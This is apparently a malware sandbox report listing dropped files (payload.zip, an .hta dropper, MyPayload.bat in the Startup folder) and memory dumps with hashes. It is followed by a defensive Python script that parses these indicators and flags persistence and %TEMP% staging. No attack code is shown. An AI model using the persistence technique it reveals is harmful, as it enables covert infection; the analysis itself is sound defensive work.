                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixkxl55h.51v.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\payload.zip

                            Filesize

                            246KB

                            MD5

                            5ca67dcd659cbf4b25ddce8c87377c73

                            SHA1

                            366b7a4365c788c8d76c80b380bfa30d44ac8d2b

                            SHA256

                            ad3f560b6ad8a02ea4dd1c194a396ffac3bf06bcf0a004c60911c3f198eb2645

                            SHA512

                            30d9daac20474a54de9532f2c5c0bdc5b441f1e0629e20bbb1bda8daf9cbd385ff612b58ee06263d8ef886d6fbb112092a3c1432fb8e07848f9c1f34a85c2a52

                          • C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta

                            Filesize

                            726B

                            MD5

                            7c032c826f96ffdc1979214c6cf1312c

                            SHA1

                            a47cec479301c961d6913d6b55f93912fb84e0a9

                            SHA256

                            50dd0aec6a087cada0d70001edaea10f55e9de42250a389cac61eefa78a93fab

                            SHA512

                            a080ddbce83d4ec7901d36c909e6e61e50dd5ee13a1abdc28436165e0336269ff7a0f26b10f5e1bbc1f9b035dcec8dd23b60510746ef86964f7fbb69e1d2b025

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

                            Filesize

                            330KB

                            MD5

                            685fb118c357497e779efb8a586d8407

                            SHA1

                            bbb8cf75a140f43720e1db831bad3e2db09e4ff7

                            SHA256

                            a335b31be9707d1960e67b6ac6e13598d05eb4d924c45cd6a16daec275c3f1ae

                            SHA512

                            feec56c01e68aaad374f58ce2333ea83820f8576e743d1c7a6efcbad984adb6133463f52c9169eda1ca2593702fb14cc1b7e596c5e72384418419712cf1e74b8

                          • memory/1196-48-0x0000000000AA0000-0x0000000000F59000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/1196-33-0x0000000000AA0000-0x0000000000F59000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/1736-567-0x0000000000D80000-0x0000000001239000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/1736-563-0x0000000000D80000-0x0000000001239000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/1876-310-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/1876-312-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/2196-94-0x0000000005F00000-0x0000000005F12000-memory.dmp

                            Filesize

                            72KB

                          • memory/2196-95-0x0000000005EF0000-0x0000000005EFA000-memory.dmp

                            Filesize

                            40KB

                          • memory/2196-67-0x0000000005A50000-0x0000000005DA4000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/2196-69-0x0000000006620000-0x000000000666C000-memory.dmp

                            Filesize

                            304KB

                          • memory/2196-72-0x0000000071780000-0x00000000717CC000-memory.dmp

                            Filesize

                            304KB

                          • memory/2196-71-0x00000000066E0000-0x0000000006712000-memory.dmp

                            Filesize

                            200KB

                          • memory/2196-82-0x0000000006720000-0x000000000673E000-memory.dmp

                            Filesize

                            120KB

                          • memory/2196-83-0x00000000073C0000-0x0000000007463000-memory.dmp

                            Filesize

                            652KB

                          • memory/2196-84-0x0000000007490000-0x000000000749A000-memory.dmp

                            Filesize

                            40KB

                          • memory/2196-85-0x0000000007610000-0x0000000007621000-memory.dmp

                            Filesize

                            68KB

                          • memory/2276-495-0x0000000000DE0000-0x000000000128A000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/2276-376-0x0000000000DE0000-0x000000000128A000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/2276-477-0x0000000000DE0000-0x000000000128A000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/2276-476-0x0000000000DE0000-0x000000000128A000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/2704-608-0x0000000000400000-0x00000000008BF000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/2704-609-0x0000000000400000-0x00000000008BF000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/3088-19-0x0000000007490000-0x0000000007B0A000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/3088-5-0x00000000054B0000-0x0000000005516000-memory.dmp

                            Filesize

                            408KB

                          • memory/3088-23-0x0000000007070000-0x0000000007106000-memory.dmp

                            Filesize

                            600KB

                          • memory/3088-24-0x0000000006FD0000-0x0000000006FF2000-memory.dmp

                            Filesize

                            136KB

                          • memory/3088-25-0x00000000080C0000-0x0000000008664000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/3088-2-0x00000000045A0000-0x00000000045D6000-memory.dmp

                            Filesize

                            216KB

                          • memory/3088-3-0x0000000004C10000-0x0000000005238000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/3088-4-0x0000000004BB0000-0x0000000004BD2000-memory.dmp

                            Filesize

                            136KB

                          • memory/3088-20-0x0000000006080000-0x000000000609A000-memory.dmp

                            Filesize

                            104KB

                          • memory/3088-6-0x0000000005520000-0x0000000005586000-memory.dmp

                            Filesize

                            408KB

                          • memory/3088-16-0x00000000056B0000-0x0000000005A04000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/3088-18-0x0000000005BA0000-0x0000000005BEC000-memory.dmp

                            Filesize

                            304KB

                          • memory/3088-17-0x0000000005B50000-0x0000000005B6E000-memory.dmp

                            Filesize

                            120KB

                          • memory/3244-138-0x0000000007790000-0x00000000077A1000-memory.dmp

                            Filesize

                            68KB

                          • memory/3244-126-0x0000000071780000-0x00000000717CC000-memory.dmp

                            Filesize

                            304KB

                          • memory/3620-589-0x0000000000E80000-0x0000000001130000-memory.dmp

                            Filesize

                            2.7MB

                          • memory/3620-585-0x0000000000E80000-0x0000000001130000-memory.dmp

                            Filesize

                            2.7MB

                          • memory/3620-588-0x0000000000E80000-0x0000000001130000-memory.dmp

                            Filesize

                            2.7MB

                          • memory/3620-613-0x0000000000E80000-0x0000000001130000-memory.dmp

                            Filesize

                            2.7MB

                          • memory/3620-616-0x0000000000E80000-0x0000000001130000-memory.dmp

                            Filesize

                            2.7MB

                          • memory/4040-137-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-237-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-305-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-191-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-439-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-549-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-333-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-232-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-49-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4040-591-0x00000000003C0000-0x0000000000879000-memory.dmp

                            Filesize

                            4.7MB

                          • memory/4624-358-0x0000000000400000-0x000000000085E000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/4624-592-0x0000000000400000-0x000000000085E000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/4624-462-0x0000000000400000-0x000000000085E000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/4624-551-0x0000000000400000-0x000000000085E000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/4624-307-0x0000000000400000-0x000000000085E000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/4624-255-0x0000000000400000-0x000000000085E000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/4836-225-0x000000000B920000-0x000000000BD2B000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/4836-206-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-217-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-197-0x0000000007410000-0x0000000007416000-memory.dmp

                            Filesize

                            24KB

                          • memory/4836-210-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-201-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-218-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-223-0x0000000007430000-0x0000000007435000-memory.dmp

                            Filesize

                            20KB

                          • memory/4836-228-0x0000000007440000-0x0000000007447000-memory.dmp

                            Filesize

                            28KB

                          • memory/4836-227-0x000000000B920000-0x000000000BD2B000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/4836-184-0x0000000007180000-0x00000000071C2000-memory.dmp

                            Filesize

                            264KB

                          • memory/4836-220-0x0000000007430000-0x0000000007435000-memory.dmp

                            Filesize

                            20KB

                          • memory/4836-219-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-140-0x0000000006980000-0x00000000069C4000-memory.dmp

                            Filesize

                            272KB

                          • memory/4836-144-0x0000000006D60000-0x0000000006DD6000-memory.dmp

                            Filesize

                            472KB

                          • memory/4836-182-0x00000000048A0000-0x00000000048AA000-memory.dmp

                            Filesize

                            40KB

                          • memory/4836-194-0x0000000008240000-0x000000000844F000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/4836-196-0x0000000008240000-0x000000000844F000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/4836-203-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-204-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-205-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-207-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-208-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-209-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-211-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-212-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-213-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-214-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-215-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/4836-216-0x0000000007420000-0x0000000007430000-memory.dmp

                            Filesize

                            64KB

                          • memory/5008-409-0x0000016951390000-0x00000169513B2000-memory.dmp

                            Filesize

                            136KB
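As an added example that is not part of the tria.ge report above, the following Python script parses this dropped-file / memory-dump listing into structured records and applies the sanity checks an analyst would want before loading it as IOCs: each hash is checked against the length its algorithm implies, each `memory/<pid>-<n>-0x<start>-0x<end>` region is checked against the stated Filesize, and file paths are tagged for the Startup-folder persistence and %TEMP%-staged script artefacts this sample produced. The embedded input is constructed: the first four entries are copied from the listing, the fifth is a deliberately malformed entry (invented, not from the report) so the checks have something to flag. The report's blank spacer lines are simply ignored by the parser.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input. Entries 1-4 are copied from the report above
# (blank spacer lines removed; the parser ignores them anyway). Entry 5 is
# invented and deliberately malformed so that the checks below fire.
SAMPLE = r"""
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat
  Filesize
  330KB
  MD5
  685fb118c357497e779efb8a586d8407
  SHA1
  bbb8cf75a140f43720e1db831bad3e2db09e4ff7
  SHA256
  a335b31be9707d1960e67b6ac6e13598d05eb4d924c45cd6a16daec275c3f1ae
• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixkxl55h.51v.ps1
  Filesize
  60B
  MD5
  d17fe0a3f47be24a6453e9ef58c94641
• memory/1196-48-0x0000000000AA0000-0x0000000000F59000-memory.dmp
  Filesize
  4.7MB
• memory/2196-94-0x0000000005F00000-0x0000000005F12000-memory.dmp
  Filesize
  72KB
• memory/9999-1-0x0000000000400000-0x0000000000410000-memory.dmp
  Filesize
  4.7MB
  MD5
  deadbeef
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
KEYS = {"Filesize", *HASH_LEN}
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)(B|KB|MB)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
SCRIPT_EXT = (".ps1", ".hta", ".vbs", ".cmd", ".bat", ".js", ".wsf")


@dataclass
class Artifact:
    path: str
    size: str = ""
    hashes: dict = field(default_factory=dict)
    notes: list = field(default_factory=list)


def parse_report(text):
    """Turn the flattened bullet / Filesize / hash layout into Artifact records."""
    items, cur, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue                      # spacer line
        if line.startswith("•"):          # new entry: the path follows the bullet
            cur = Artifact(path=line[1:].strip())
            items.append(cur)
            pending = None
        elif cur is None:
            continue                      # text before the first bullet
        elif line in KEYS:
            pending = line                # a label; the value is the next line
        elif pending == "Filesize":
            cur.size, pending = line, None
        elif pending in HASH_LEN:
            cur.hashes[pending] = line.lower()
            pending = None
    return items


def size_to_bytes(size):
    m = SIZE_RE.match(size)
    if not m:
        return None
    return float(m.group(1)) * {"B": 1, "KB": 1024, "MB": 1024 ** 2}[m.group(2)]


def annotate(a):
    # 1. every digest must have the hex length its algorithm implies
    for alg, digest in a.hashes.items():
        if len(digest) != HASH_LEN[alg] or not re.fullmatch(r"[0-9a-f]+", digest):
            a.notes.append(f"malformed {alg}")
    # 2. memory dumps: the address range must agree with the stated size
    m = MEM_RE.match(a.path)
    if m:
        start, end = int(m.group(3), 16), int(m.group(4), 16)
        stated = size_to_bytes(a.size)
        # the report rounds sizes to one decimal, so allow a few percent of slack
        if stated is None or abs((end - start) - stated) > 0.05 * stated:
            a.notes.append(f"size mismatch: range is {end - start} bytes")
        return a
    # 3. dropped files: tag locations and types worth a second look
    low = a.path.lower()
    if "\\start menu\\programs\\startup\\" in low:
        a.notes.append("persistence: Startup folder")
    if "\\appdata\\local\\temp" in low:
        a.notes.append("staged under %TEMP%")
    if low.endswith(SCRIPT_EXT):
        a.notes.append("script/interpreter payload")
    return a


def analyse(text):
    return [annotate(a) for a in parse_report(text)]


if __name__ == "__main__":
    for art in analyse(SAMPLE):
        print(art.path, art.size, sorted(art.hashes), art.notes)
```

Run it as is to see the constructed fifth entry flagged for both a truncated MD5 and a 64 KiB region labelled 4.7MB, while the entries copied from the report pass. To use it on the full page, paste the whole listing into `SAMPLE` (or read it from a file); the tolerance in the size check exists only because the report rounds to one decimal, so tighten it if your source reports exact byte counts.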